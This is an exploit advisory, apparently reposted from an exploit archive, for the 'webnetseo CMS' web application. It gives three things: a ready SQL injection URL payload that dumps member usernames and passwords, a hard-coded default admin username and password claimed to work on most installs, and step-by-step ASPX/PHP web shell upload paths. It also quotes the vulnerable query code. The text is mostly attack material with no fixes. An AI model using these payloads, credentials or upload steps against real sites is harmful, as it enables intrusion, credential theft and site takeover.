webnetseo CMS Multiple Vulnerabilities

###########################################################
# Exploit Title : webnetseo CMS Multiple Vulnerabilities
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage: webnetseo.net
# Date : 2017 07 May
# Category : WebApp
# MY HOME : Ashiyane.org
# CWE : CWE-89 - CWE-276 And ...
# Video : https://www.youtube.com/watch?v=dZLDPYJeLSw
###########################################################
webnetseo CMS Multiple Vulnerabilities
1-SQL INJECTION
2-Default Account
3-Upload shell - ASPX
Research by Ashiyane Digital Security Team
###########################################################
1-SQL INJECTION
Some sql Vulnerability location
/picc.php?id=
Localhost://picc.php?id=-[inputSQL]+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from+member--+/
source Vulnerability
files : Picc.php
$id=$_GET["id"];
$id2=$_GET["id2"];
$id3=$_GET["id3"];
$strQuery = "SELECT * FROM pic where id > '$id' && class_id='$id3' order by id asc";
$db->query($strQuery);
if($db->next_record()){
echo '<a href="picc.php?id='.$db->f("id").'&id3='.f("class_id").'" style="font-size:12px; font-weight:normal; " >'.$db->f("title").'</a>';
}else{
echo "?";
}
?></td>
</tr>
###########################################################
2-Default Account
90% sites Default Account Default Account
USER : yxy746380
PASS : 746380
###########################################################
3-Upload shell - ASPX
go to TARGET.COM/admin/pic.php?id=2
upload ASPX And ASP shell
shell location : TARGET.COM/images/upload_file/[RandonName.aspx]
finishd
4-Or go url : 127.0.0.1/path/admin/up.php , upload file, File Location : http:/127.0.0.1/path/images/upload_file/FILE_NAME.php
################################################
# Discovered By : Hassan Shakeri
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat - [email protected]
###########################################################

#  0day.today [2018-04-11]  #